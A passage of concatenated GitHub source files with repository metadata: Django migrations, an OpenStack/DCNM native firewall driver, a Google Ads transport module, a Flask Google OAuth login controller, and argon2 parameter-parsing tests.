"ref": "refs/heads/f22-patches",
"path": "nova/network/base_api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groff",
"bytes": "112"
},
{
"name": "PLpgSQL",
"bytes": "2958"
},
{
"name": "Python",
"bytes": "15424955"
},
{
"name": "Shell",
"bytes": "20796"
},
{
"name": "Smarty",
"bytes": "678196"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
    # Initial schema: creates the Match table and the Slot table (one row
    # per player slot, FK'd to its Match).
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Match',
            fields=[
                # Dota match identifier from the API is used directly as PK.
                ('match_id', models.BigIntegerField(primary_key=True, serialize=False)),
                ('match_seq_num', models.BigIntegerField(null=True)),
                ('radiant_win', models.BooleanField()),
                ('duration', models.IntegerField(null=True)),
                ('start_time', models.DateTimeField(null=True)),
                ('patch', models.CharField(max_length=255, null=True)),
                # Bitmask-style status fields stored as plain integers.
                ('tower_status_radiant', models.IntegerField(null=True)),
                ('tower_status_dire', models.IntegerField(null=True)),
                ('barracks_status_radiant', models.IntegerField(null=True)),
                ('barracks_status_dire', models.IntegerField(null=True)),
                ('cluster', models.IntegerField(null=True)),
                ('first_blood_time', models.IntegerField(null=True)),
                ('lobby_type', models.CharField(max_length=255, null=True)),
                ('human_players', models.IntegerField(null=True)),
                ('leagueid', models.IntegerField(null=True)),
                ('game_mode', models.CharField(max_length=255, null=True)),
                ('flags', models.IntegerField(null=True)),
                ('engine', models.IntegerField(null=True)),
                ('radiant_score', models.IntegerField(null=True)),
                ('dire_score', models.IntegerField(null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Slot',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('team', models.CharField(max_length=10)),
                ('account_id', models.BigIntegerField(null=True)),
                ('hero_id', models.IntegerField()),
                # Comma-separated item ids, validated by regex.
                ('items', models.CharField(max_length=255, null=True, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
                ('kills', models.IntegerField(null=True)),
                ('deaths', models.IntegerField(null=True)),
                ('assists', models.IntegerField(null=True)),
                ('leaver_status', models.IntegerField(null=True)),
                ('last_hits', models.IntegerField(null=True)),
                ('denies', models.IntegerField(null=True)),
                ('gpm', models.IntegerField(null=True)),
                ('xpm', models.IntegerField(null=True)),
                ('level', models.IntegerField(null=True)),
                ('gold', models.IntegerField(null=True)),
                ('gold_spent', models.IntegerField(null=True)),
                ('hero_damage', models.IntegerField(null=True)),
                ('tower_damage', models.IntegerField(null=True)),
                ('hero_healing', models.IntegerField(null=True)),
                ('match', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='slots', to='app.Match')),
            ],
        ),
    ]
| {
"content_hash": "c6176dfe171d00b84c741d1bcf32ca9b",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 225,
"avg_line_length": 50.17910447761194,
"alnum_prop": 0.565437239738251,
"repo_name": "lucashanke/houseofdota",
"id": "aeab7e1683e2bc58f35c4d56aca0d947b6ee872f",
"size": "3434",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6664"
},
{
"name": "Clojure",
"bytes": "4254"
},
{
"name": "HTML",
"bytes": "1914"
},
{
"name": "JavaScript",
"bytes": "69894"
},
{
"name": "Python",
"bytes": "120362"
}
],
"symlink_target": ""
} |
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial schema: a single KubePod table mirroring basic Kubernetes
    # pod metadata (name, labels, phase, IP).
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='KubePod',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True,
                                        serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                # Serialized pod labels (single CharField, not relational).
                ('labels', models.CharField(max_length=255)),
                ('phase', models.CharField(max_length=20)),
                ('ip', models.CharField(max_length=15)),
            ],
        ),
    ]
| {
"content_hash": "cb215ece6b1377a65a7213095fdfeb6f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 77,
"avg_line_length": 28.52173913043478,
"alnum_prop": 0.5076219512195121,
"repo_name": "mlbench/mlbench",
"id": "cb8c80931cf1d24e2b48e253f7344a6445809b1d",
"size": "705",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "mlbench/master/api/migrations/0001_initial.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2829"
},
{
"name": "Dockerfile",
"bytes": "4848"
},
{
"name": "HTML",
"bytes": "26229"
},
{
"name": "JavaScript",
"bytes": "217157"
},
{
"name": "Makefile",
"bytes": "2646"
},
{
"name": "Python",
"bytes": "163751"
},
{
"name": "Ruby",
"bytes": "5299"
},
{
"name": "Shell",
"bytes": "10874"
},
{
"name": "Smarty",
"bytes": "1998"
}
],
"symlink_target": ""
} |
import time
from dfa.common import config
from dfa.common import dfa_logger as logging
from dfa.server.services.firewall.native import fabric_setup_base as FP
from dfa.server.services.firewall.native.drivers import base
import dfa.server.services.firewall.native.fw_constants as fw_const
from dfa.server.dfa_openstack_helper import DfaNeutronHelper as OsHelper
# Module-level logger for the native firewall driver.
LOG = logging.getLogger(__name__)
class NativeFw(base.BaseDrvr, FP.FabricApi):
    '''Native Firewall Driver.

    Implements the firewall by attaching an OpenStack router between a
    tenant's IN and OUT service networks, programming next-hop routes in
    the router namespace, pushing static routes to DCNM, and publishing
    service-VNIC create/delete events on the event queue for VDP.
    '''
    def __init__(self):
        ''' Class init '''
        LOG.debug("Initializing Native Firewall")
        super(NativeFw, self).__init__()
        # Per-tenant state: tenant_id -> {'host': ..., 'rout_id': ...}
        self.tenant_dict = {}
        self.os_helper = OsHelper()
        self.cfg = config.CiscoDFAConfig().cfg
        self.mgmt_ip_addr = None
        self.dcnm_obj = None
        self.que_obj = None
    def initialize(self, cfg_dict):
        ''' Initialization routine '''
        LOG.debug("Initialize for NativeFw")
        self.mgmt_ip_addr = cfg_dict.get('mgmt_ip_addr')
    def pop_evnt_que(self, que_obj):
        ''' Populate the event queue object '''
        LOG.debug("Pop Event for NativeFw")
        self.que_obj = que_obj
    def pop_dcnm_obj(self, dcnm_obj):
        ''' Populate the DCNM object '''
        LOG.debug("Pop DCNM for NativeFw")
        self.dcnm_obj = dcnm_obj
    def is_device_virtual(self):
        ''' Returns if device is virtual '''
        return True
    def get_name(self):
        ''' Returns the name of the FW appliance '''
        # Put it in a constant fixme(padkrish)
        return 'native'
    def get_max_quota(self):
        # Return the right value fixme
        '''
        Returns the maximum number of FW instance that a single FW can
        support
        '''
        return 50
    def attach_intf_router(self, tenant_id, tenant_name, rtr_id):
        ''' Routine to attach the IN and OUT subnets to the router '''
        in_sub = self.get_in_subnet_id(tenant_id)
        out_sub = self.get_out_subnet_id(tenant_id)
        # Modify Hard coded Name fixme
        subnet_lst = set()
        subnet_lst.add(in_sub)
        subnet_lst.add(out_sub)
        ret = self.os_helper.add_intf_router(rtr_id, tenant_id, subnet_lst)
        return ret, in_sub, out_sub
    def get_rtr_id(self, tenant_id, tenant_name):
        ''' Retrieve the router ID, from local cache or by name lookup '''
        rout_id = None
        if tenant_id in self.tenant_dict:
            if 'rout_id' in self.tenant_dict.get(tenant_id):
                rout_id = self.tenant_dict.get(tenant_id).get('rout_id')
        if rout_id is None:
            rtr_list = self.os_helper.get_rtr_by_name('FW_RTR_' + tenant_name)
            if len(rtr_list) > 0:
                rout_id = rtr_list[0].get('id')
        return rout_id
    def delete_intf_router(self, tenant_id, tenant_name, rout_id):
        ''' Routine to detach the service subnets from the router.

        NOTE(review): the passed-in rout_id is always overwritten by a
        fresh lookup below — confirm callers rely on that (e.g. restart
        cases where the caller's id may be stale).
        '''
        in_sub = self.get_in_subnet_id(tenant_id)
        out_sub = self.get_out_subnet_id(tenant_id)
        subnet_lst = set()
        subnet_lst.add(in_sub)
        subnet_lst.add(out_sub)
        rout_id = self.get_rtr_id(tenant_id, tenant_name)
        if rout_id is not None:
            ret = self.os_helper.delete_intf_router(tenant_name, tenant_id,
                                                    rout_id, subnet_lst)
            if not ret:
                LOG.error("Failed to delete router intf id %(rout)s, tenant "
                          "%(tenant)s", {'rout': rout_id, 'tenant': tenant_id})
            return ret
        else:
            LOG.error("Invalid router ID, can't delete interface from router")
            return False
    def prepare_rout_vm_msg(self, tenant_id, tenant_name, rout_id, net_id,
                            subnet_id, seg, status):
        '''
        Prepare the message to be sent to Event queue for VDP trigger.
        This is actually called for a subnet add to a router. This function
        prepares a VM's VNIC create/delete message
        '''
        # Retry until the port's binding host is populated (up to 4 tries
        # with a 3 second pause between attempts).
        flag = True
        cnt = 0
        while flag:
            port_data = self.os_helper.get_router_port_subnet(subnet_id)
            if port_data is None:
                LOG.error("Unable to get router port data")
                return None
            if port_data.get('binding:host_id') == '':
                time.sleep(3)
                cnt = cnt + 1
                if cnt > 3:
                    flag = False
            else:
                flag = False
        # BUGFIX: compare status by value, not identity ('is' on string
        # literals only works by accident of CPython interning).
        if status == 'up':
            event_type = 'service.vnic.create'
        else:
            event_type = 'service.vnic.delete'
        vnic_data = {}
        vnic_data['status'] = status
        vnic_data['mac'] = port_data.get('mac_address')
        vnic_data['segid'] = seg
        vnic_data['host'] = port_data.get('binding:host_id')
        if vnic_data['host'] == '':
            LOG.error("Null host for seg %(seg)s subnet %(subnet)s",
                      {'seg': seg, 'subnet': subnet_id})
            # Fall back to the host cached from a previous message.
            if self.tenant_dict.get(tenant_id).get('host') is None:
                LOG.error("Null host for tenant %(tenant)s seg %(seg)s "
                          "subnet %(subnet)s",
                          {'tenant': tenant_id, 'seg': seg,
                           'subnet': subnet_id})
                return None
            else:
                vnic_data['host'] = self.tenant_dict.get(tenant_id).get('host')
        else:
            self.tenant_dict[tenant_id]['host'] = vnic_data['host']
        vnic_data['port_id'] = port_data.get('id')
        vnic_data['network_id'] = net_id
        vnic_data['vm_name'] = 'FW_SRVC_RTR_' + tenant_name
        vnic_data['vm_ip'] = port_data.get('fixed_ips')[0].get('ip_address')
        vnic_data['vm_uuid'] = rout_id
        vnic_data['gw_mac'] = None
        vnic_data['fwd_mod'] = 'anycast_gateway'
        payload = {'service': vnic_data}
        data = (event_type, payload)
        return data
    def send_rout_port_msg(self, tenant_id, tenant_name, rout_id, net_id,
                           subnet_id, seg, status):
        ''' Sends the router port message to the queue '''
        data = self.prepare_rout_vm_msg(tenant_id, tenant_name, rout_id,
                                        net_id, subnet_id, seg, status)
        if data is None:
            return False
        timestamp = time.ctime()
        # Remove hardcoding fixme (PRI_LOW_START)
        pri = 30 + 4
        LOG.info("Sending native FW data into queue %(data)s", {'data': data})
        self.que_obj.put((pri, timestamp, data))
        return True
    def create_tenant_dict(self, tenant_id, rout_id=None):
        ''' Tenant dict creation '''
        self.tenant_dict[tenant_id] = {}
        self.tenant_dict[tenant_id]['host'] = None
        self.tenant_dict[tenant_id]['rout_id'] = rout_id
    def _create_fw(self, tenant_id, data):
        ''' Internal routine that gets called when a FW is created.

        Attaches the router, programs DCNM static routes, the router's
        default GW and per-network next hops, then publishes VNIC-up
        events for the IN and OUT service networks.  Rolls back (router
        detach / VNIC-down) on each failure.
        '''
        LOG.debug("In creating Native FW data is %s", data)
        tenant_name = data.get('tenant_name')
        in_seg, in_vlan = self.get_in_seg_vlan(tenant_id)
        out_seg, out_vlan = self.get_out_seg_vlan(tenant_id)
        # self.get_mgmt_ip_addr(tenant_id)
        # self.get_vlan_in_out(tenant_id)
        # Check if router is already added and only then add, needed for
        # restart cases since native doesn't have a special DB fixme
        rout_id = data.get('router_id')
        ret, in_sub, out_sub = self.attach_intf_router(tenant_id,
                                                       tenant_name, rout_id)
        if not ret:
            LOG.error("Native FW: Attach intf router failed for tenant %s",
                      tenant_id)
            return False
        self.create_tenant_dict(tenant_id, rout_id)
        in_ip, in_start, in_end, in_gw, in_sec_gw = \
            self.get_in_ip_addr(tenant_id)
        out_ip, out_start, out_end, out_gw, out_sec_gw = \
            self.get_out_ip_addr(tenant_id)
        excl_list = []
        excl_list.append(in_ip)
        excl_list.append(out_ip)
        # Program DCNM to update profile's static IP address on OUT part
        ip_list = self.os_helper.get_subnet_nwk_excl(tenant_id, excl_list)
        srvc_node_ip = self.get_out_srvc_node_ip_addr(tenant_id)
        ret = self.dcnm_obj.update_partition_static_route(
            tenant_name,
            fw_const.SERV_PART_NAME, ip_list,
            vrf_prof=self.cfg.firewall.fw_service_part_vrf_profile,
            service_node_ip=srvc_node_ip)
        if not ret:
            LOG.error("Unable to update DCNM ext profile with static route %s",
                      rout_id)
            ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
            return False
        # Program the default GW in router namespace; the namespace may not
        # be ready immediately, so retry a few times.
        ret = False
        cnt = 0
        if out_gw != 0:
            while not ret and cnt <= 3:
                time.sleep(5)
                ret = self.os_helper.program_rtr_default_gw(tenant_id, rout_id,
                                                            out_gw)
                cnt = cnt + 1
        if not ret:
            LOG.error("Unable to program default GW in router %s", rout_id)
            ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
            return False
        # Program router namespace to have all tenant networks to be routed
        # to IN service network
        ret = False
        if in_gw != 0:
            ret = self.os_helper.program_rtr_all_nwk_next_hop(
                tenant_id, rout_id, in_gw, excl_list)
        if not ret:
            LOG.error("Unable to program default router next hop %s",
                      rout_id)
            ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
            return False
        # Send message for router port auto config for in service nwk
        in_net = self.get_in_net_id(tenant_id)
        ret = self.send_rout_port_msg(tenant_id, tenant_name + '_in', rout_id,
                                      in_net, in_sub, in_seg, 'up')
        if not ret:
            LOG.error("Sending rout port message failed for in network "
                      "tenant %(tenant)s subnet %(seg)s",
                      {'tenant': tenant_id, 'seg': in_seg})
            ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
            return False
        # Send message for router port auto config for out service nwk
        out_net = self.get_out_net_id(tenant_id)
        ret = self.send_rout_port_msg(tenant_id, tenant_name + '_out', rout_id,
                                      out_net, out_sub, out_seg, 'up')
        if not ret:
            LOG.error("Sending rout port message failed for out network "
                      "tenant %(tenant)s subnet %(seg)s",
                      {'tenant': tenant_id, 'seg': out_seg})
            # Roll back the IN-network VNIC-up event sent above.
            ret = self.send_rout_port_msg(tenant_id, tenant_name + '_in',
                                          rout_id, in_net, in_sub, in_seg,
                                          'down')
            if not ret:
                LOG.error("Error case, sending rout port message for in nwk"
                          " tenant %(tenant)s subnet %(seg)s",
                          {'tenant': tenant_id, 'seg': in_seg})
            ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
            return False
        return True
    def create_fw(self, tenant_id, data):
        ''' Top level routine called when a FW is created '''
        try:
            ret = self._create_fw(tenant_id, data)
            return ret
        except Exception as exc:
            LOG.error("Failed to create FW for device native, tenant "
                      "%(tenant)s data %(data)s Exc %(exc)s",
                      {'tenant': tenant_id, 'data': data, 'exc': exc})
            return False
    # Create exceptions for all these fixme
    def _delete_fw(self, tenant_id, data):
        ''' Internal routine called when a FW is deleted.

        Publishes VNIC-down events for the IN and OUT service networks
        and detaches the service subnets from the router.
        '''
        LOG.debug("In Delete fw data is %s", data)
        # Do the necessary stuffs in ASA
        tenant_name = data.get('tenant_name')
        in_seg, in_vlan = self.get_in_seg_vlan(tenant_id)
        out_seg, out_vlan = self.get_out_seg_vlan(tenant_id)
        in_net = self.get_in_net_id(tenant_id)
        out_net = self.get_out_net_id(tenant_id)
        in_sub = self.get_in_subnet_id(tenant_id)
        out_sub = self.get_out_subnet_id(tenant_id)
        rout_id = data.get('router_id')
        if rout_id is None:
            LOG.error("Router ID unknown for tenant %s", tenant_id)
            return False
        if tenant_id not in self.tenant_dict:
            # Restart case: rebuild the local cache entry.
            self.create_tenant_dict(tenant_id, rout_id)
        ret = self.send_rout_port_msg(tenant_id, tenant_name + '_in', rout_id,
                                      in_net, in_sub, in_seg, 'down')
        if not ret:
            LOG.error("Error case, sending rout port message for in nwk"
                      " tenant %(tenant)s subnet %(seg)s",
                      {'tenant': tenant_id, 'seg': in_seg})
        ret = self.send_rout_port_msg(tenant_id, tenant_name + '_out', rout_id,
                                      out_net, out_sub, out_seg, 'down')
        if not ret:
            LOG.error("Sending rout port message failed for out network "
                      "tenant %(tenant)s subnet %(seg)s",
                      {'tenant': tenant_id, 'seg': out_seg})
        # Usually sending message to queue doesn't fail!!!
        rout_ret = self.delete_intf_router(tenant_id, tenant_name, rout_id)
        if not rout_ret:
            LOG.error("Unable to delete router for tenant %s, error case",
                      tenant_id)
            return rout_ret
        del self.tenant_dict[tenant_id]
        return rout_ret
    def delete_fw(self, tenant_id, data):
        ''' Top level routine called when a FW is deleted '''
        try:
            ret = self._delete_fw(tenant_id, data)
            return ret
        except Exception as exc:
            LOG.error("Failed to delete FW for device native, tenant "
                      "%(tenant)s data %(data)s Exc %(exc)s",
                      {'tenant': tenant_id, 'data': data, 'exc': exc})
            return False
    def modify_fw(self, tenant_id, data):
        '''
        Routine called when FW attributes gets modified. Nothing to be done
        for native FW.
        '''
        LOG.debug("In Modify fw data is %s", data)
    def _program_dcnm_static_route(self, tenant_id, tenant_name):
        ''' Program DCNM Static Route '''
        in_ip, in_start, in_end, in_gw, in_sec_gw = \
            self.get_in_ip_addr(tenant_id)
        if in_gw is None:
            LOG.error("No FW service GW present")
            return False
        out_ip, out_start, out_end, out_gw, out_sec_gw = \
            self.get_out_ip_addr(tenant_id)
        # Program DCNM to update profile's static IP address on OUT part
        excl_list = []
        excl_list.append(in_ip)
        excl_list.append(out_ip)
        subnet_lst = self.os_helper.get_subnet_nwk_excl(tenant_id, excl_list,
                                                        excl_part=True)
        # This count is for telling DCNM to insert the static route in a
        # particular position. Total networks created - exclusive list as
        # above - the network that just got created.
        srvc_node_ip = self.get_out_srvc_node_ip_addr(tenant_id)
        ret = self.dcnm_obj.update_partition_static_route(
            tenant_name, fw_const.SERV_PART_NAME, subnet_lst,
            vrf_prof=self.cfg.firewall.fw_service_part_vrf_profile,
            service_node_ip=srvc_node_ip)
        if not ret:
            LOG.error("Unable to update DCNM ext profile with static route")
            return False
        return True
    def nwk_create_notif(self, tenant_id, tenant_name, cidr):
        '''
        Tenant Network create Notification
        Restart is not supported currently for this.
        '''
        rout_id = self.get_rtr_id(tenant_id, tenant_name)
        if rout_id is None:
            LOG.error("Rout ID not present for tenant")
            return False
        ret = self._program_dcnm_static_route(tenant_id, tenant_name)
        if not ret:
            LOG.error("Program DCNM with static routes failed for rout %s",
                      rout_id)
            return False
        # Program router namespace to have this network to be routed
        # to IN service network
        in_ip, in_start, in_end, in_gw, in_sec_gw = \
            self.get_in_ip_addr(tenant_id)
        if in_gw is None:
            LOG.error("No FW service GW present")
            return False
        ret = self.os_helper.program_rtr_nwk_next_hop(rout_id, in_gw, cidr)
        if not ret:
            LOG.error("Unable to program default router next hop %s",
                      rout_id)
            return False
        return True
    def nwk_delete_notif(self, tenant_id, tenant_name, nwk_id):
        '''
        Tenant Network delete Notification
        Restart is not supported currently for this.
        '''
        rout_id = self.get_rtr_id(tenant_id, tenant_name)
        if rout_id is None:
            LOG.error("Rout ID not present for tenant")
            return False
        ret = self._program_dcnm_static_route(tenant_id, tenant_name)
        if not ret:
            LOG.error("Program DCNM with static routes failed for rout %s",
                      rout_id)
            return False
        # Program router namespace to have this network to be routed
        # to IN service network
        in_ip, in_start, in_end, in_gw, in_sec_gw = \
            self.get_in_ip_addr(tenant_id)
        if in_gw is None:
            LOG.error("No FW service GW present")
            return False
        out_ip, out_start, out_end, out_gw, out_sec_gw = \
            self.get_out_ip_addr(tenant_id)
        excl_list = []
        excl_list.append(in_ip)
        excl_list.append(out_ip)
        subnet_lst = self.os_helper.get_subnet_nwk_excl(tenant_id, excl_list,
                                                        excl_part=True)
        ret = self.os_helper.remove_rtr_nwk_next_hop(rout_id, in_gw,
                                                     subnet_lst, excl_list)
        if not ret:
            LOG.error("Unable to program default router next hop %s",
                      rout_id)
            return False
        return True
| {
"content_hash": "b2c0634a66335321f50c167217888982",
"timestamp": "",
"source": "github",
"line_count": 438,
"max_line_length": 79,
"avg_line_length": 42.19634703196347,
"alnum_prop": 0.5421491180608159,
"repo_name": "CiscoSystems/fabric_enabler",
"id": "240663a170a8ab568b01b95b53d4e188657a9ba2",
"size": "19119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dfa/server/services/firewall/native/drivers/native.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "920145"
},
{
"name": "Shell",
"bytes": "8220"
}
],
"symlink_target": ""
} |
from collections import OrderedDict
from typing import Dict, Type
from .base import LabelServiceTransport
from .grpc import LabelServiceGrpcTransport
# Registry of available transport classes, keyed by transport name.
_transport_registry = OrderedDict(
    [("grpc", LabelServiceGrpcTransport)]
)  # type: Dict[str, Type[LabelServiceTransport]]

__all__ = (
    "LabelServiceTransport",
    "LabelServiceGrpcTransport",
)
| {
"content_hash": "b068b632cf119be5cd3845ceafa5e803",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 55,
"avg_line_length": 25.8125,
"alnum_prop": 0.7675544794188862,
"repo_name": "googleads/google-ads-python",
"id": "4d2b0c75098213d3776623ec45a9580462b67ea7",
"size": "1013",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "google/ads/googleads/v11/services/services/label_service/transports/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "23399881"
}
],
"symlink_target": ""
} |
import os
from flask import redirect, url_for, request, session
from flask_restplus import Namespace, Resource
from flask_dance.contrib.google import make_google_blueprint
from flask_dance.consumer import oauth_authorized
from flask_dance.consumer.storage.sqla import SQLAlchemyStorage
from flask_login import current_user, login_user
from backend.service import UserService
from backend.model import OAuth
from backend.dao.postgres_db import DBSession
from backend.util.response.error import ErrorResponse
from backend.util.safe_url import is_safe_url
from backend.controller import ErrorHandler
# Flask-Dance blueprint implementing the Google OAuth2 flow.  Client
# credentials come from the environment; granted tokens are persisted in
# the OAuth table, keyed to the currently logged-in user.
bplogin = make_google_blueprint(
    login_url="google_login",
    client_id=os.getenv("OAUTH_CLIENT_ID"),
    client_secret=os.getenv("OAUTH_CLIENT_SECRET"),
    scope=["https://www.googleapis.com/auth/userinfo.profile", "https://www.googleapis.com/auth/userinfo.email", "openid"],
    offline=True,
    redirect_url="",
    storage=SQLAlchemyStorage(OAuth, DBSession(), user=current_user)
)
@oauth_authorized.connect_via(bplogin)
def user_logged_in(blueprint, token):
    """OAuth-authorized callback: map the Google account to a local user.

    Fetches the Google profile, creates OAuth/user records on first
    login, and logs the user in.  Redirects back to the index with an
    error flag on any failure; returns False on success.
    """
    if not token:
        return redirect(url_for("frontend.index", error="token"))
    response = blueprint.session.get("/oauth2/v1/userinfo")
    if not response.ok:
        return redirect(url_for("frontend.index", error="error"))
    try:
        user_service = UserService()
        user_info = response.json()
        oauth = user_service.get_create_oauth(
            provider=blueprint.name,
            provider_user_id=user_info["id"],
            token=token,
        )
        if not oauth.user:
            # First login with this provider account: create the user row.
            user_service.get_create_user(
                oauth=oauth,
                email=user_info["email"],
                name=user_info["name"],
                picture=user_info["picture"],
            )
        login_user(oauth.user)
        return False
    except Exception:
        return redirect(url_for("frontend.index", error="error"))
# REST namespace for the login resource, and the shared error model used
# in its response documentation.
loginNS = Namespace("User", description="User authentication with OAuth2.")
ERRORMODEL = ErrorResponse.get_model(loginNS, "ErrorResponse")
@loginNS.route("", strict_slashes=False)
class LoginAuthController(Resource):
    """Login endpoint: starts the Google OAuth2 flow for anonymous users."""

    @loginNS.response(302, "Redirect to login URL or index")
    @loginNS.response(500, "Unexpected Error", ERRORMODEL)
    def get(self):
        """User login.

        Anonymous users are redirected into the OAuth flow; already
        authenticated users are sent back to the index.  Unexpected
        errors are delegated to ErrorHandler.
        """
        try:
            # Idiom fix: truth-test the flag instead of identity-comparing
            # against the literal False.
            if not current_user.is_authenticated:
                # Remember where to send the user after OAuth completes,
                # but only if the target is safe (prevents open redirects).
                next_url = request.args.get("next")
                if next_url is not None and is_safe_url(next_url):
                    session["next_url"] = next_url
                return redirect(url_for("google.login"))
            else:
                return redirect(url_for("frontend.index"))
        except Exception as error:
            return ErrorHandler(error).handle_error()
| {
"content_hash": "416a26997fb4e8ac79163bdf246bf05e",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 123,
"avg_line_length": 36.88607594936709,
"alnum_prop": 0.648936170212766,
"repo_name": "willrp/willbuyer",
"id": "51d33f2cf30a4e13a15447a561249b8d30b84a4e",
"size": "2914",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backend/controller/auth/login.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8210"
},
{
"name": "Dockerfile",
"bytes": "1242"
},
{
"name": "HTML",
"bytes": "999"
},
{
"name": "JavaScript",
"bytes": "162138"
},
{
"name": "Python",
"bytes": "250597"
}
],
"symlink_target": ""
} |
__author__ = 'prossi'
class USER:
    """Expose an XML element's attributes as plain instance attributes,
    together with the API connection that produced it."""

    def __init__(self, obj, connection):
        # Copy every XML attribute onto this (fresh, empty) instance so
        # callers can use attribute access, e.g. user.name.
        self.__dict__.update(dict(obj.attrib))
        self.connection = connection
| {
"content_hash": "8888500c9e29d4bca94cd44b7ff1ea75",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 40,
"avg_line_length": 19.5,
"alnum_prop": 0.5769230769230769,
"repo_name": "skyscape-cloud-services/skyscape_python",
"id": "52b8c80ba4549319f8f28c0e75544465cfdce08e",
"size": "156",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "skyscape/skyscape_user.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "56037"
}
],
"symlink_target": ""
} |
from base64 import b64encode
import pytest
from hypothesis import given
from hypothesis import strategies as st
from argon2 import Parameters, Type, extract_parameters
from argon2._utils import NoneType, _check_types, _decoded_str_len
from argon2.exceptions import InvalidHash
class TestCheckTypes:
    """Tests for argon2._utils._check_types."""

    def test_success(self):
        """
        Returns None if all types are okay.
        """
        assert None is _check_types(
            bytes=(b"bytes", bytes),
            tuple=((1, 2), tuple),
            str_or_None=(None, (str, NoneType)),
        )

    def test_fail(self):
        """
        Returns summary of failures.
        """
        rv = _check_types(
            bytes=("not bytes", bytes), str_or_None=(42, (str, NoneType))
        )

        assert "." == rv[-1]  # proper grammar FTW
        assert "'str_or_None' must be a str, or NoneType (got int)" in rv
        assert "'bytes' must be a bytes (got str)" in rv
@given(st.binary())
def test_decoded_str_len(bs):
    """
    _decoded_str_len computes the resulting length.
    """
    # Property: for any bytes, the predicted decoded length of its unpadded
    # base64 encoding equals the original byte length.
    assert len(bs) == _decoded_str_len(len(b64encode(bs).rstrip(b"=")))
# Known-good argon2id hash and the Parameters it encodes.
VALID_HASH = (
    "$argon2id$v=19$m=65536,t=2,p=4$"
    "c29tZXNhbHQ$GpZ3sK/oH9p7VIiV56G/64Zo/8GaUw434IimaPqxwCo"
)
VALID_PARAMETERS = Parameters(
    type=Type.ID,
    salt_len=8,
    hash_len=32,
    version=19,
    memory_cost=65536,
    time_cost=2,
    parallelism=4,
)

# Legacy hash without a "v=" field; parsed as version 18.
VALID_HASH_V18 = (
    "$argon2i$m=8,t=1,p=1$c29tZXNhbHQ$gwQOXSNhxiOxPOA0+PY10P9QFO"
    "4NAYysnqRt1GSQLE55m+2GYDt9FEjPMHhP2Cuf0nOEXXMocVrsJAtNSsKyfg"
)
VALID_PARAMETERS_V18 = Parameters(
    type=Type.I,
    salt_len=8,
    hash_len=64,
    version=18,
    memory_cost=8,
    time_cost=1,
    parallelism=1,
)
class TestExtractParameters:
    """Tests for argon2.extract_parameters."""

    def test_valid_hash(self):
        """
        A valid hash is parsed.
        """
        parsed = extract_parameters(VALID_HASH)

        assert VALID_PARAMETERS == parsed

    def test_valid_hash_v18(self):
        """
        A valid Argon2 v1.2 hash is parsed.
        """
        parsed = extract_parameters(VALID_HASH_V18)

        assert VALID_PARAMETERS_V18 == parsed

    @pytest.mark.parametrize(
        "hash",
        [
            "",
            "abc" + VALID_HASH,
            VALID_HASH.replace("p=4", "p=four"),
            VALID_HASH.replace(",p=4", ""),
        ],
    )
    def test_invalid_hash(self, hash):
        """
        Invalid hashes of various types raise an InvalidHash error.
        """
        with pytest.raises(InvalidHash):
            extract_parameters(hash)
class TestParameters:
    """Tests for the Parameters value object."""

    def test_eq(self):
        """
        Parameters are equal iff every attribute is equal.
        """
        assert VALID_PARAMETERS == VALID_PARAMETERS
        assert not VALID_PARAMETERS != VALID_PARAMETERS

    def test_eq_wrong_type(self):
        """
        Parameters are only compared if they have the same type.
        """
        assert VALID_PARAMETERS != "foo"
        assert not VALID_PARAMETERS == object()

    def test_repr(self):
        """
        __repr__ returns a sensible string.
        """
        assert repr(
            Parameters(
                type=Type.ID,
                salt_len=8,
                hash_len=32,
                version=19,
                memory_cost=65536,
                time_cost=2,
                parallelism=4,
            )
        ) == (
            "Parameters(type=<Type.ID: 2>, version=19, salt_len=8, "
            "hash_len=32, time_cost=2, memory_cost=65536, parallelism=4)"
        )
| {
"content_hash": "5e9c70f55135bfbdd23555f42161f787",
"timestamp": "",
"source": "github",
"line_count": 142,
"max_line_length": 73,
"avg_line_length": 24.95774647887324,
"alnum_prop": 0.5634875846501128,
"repo_name": "hynek/argon2_cffi",
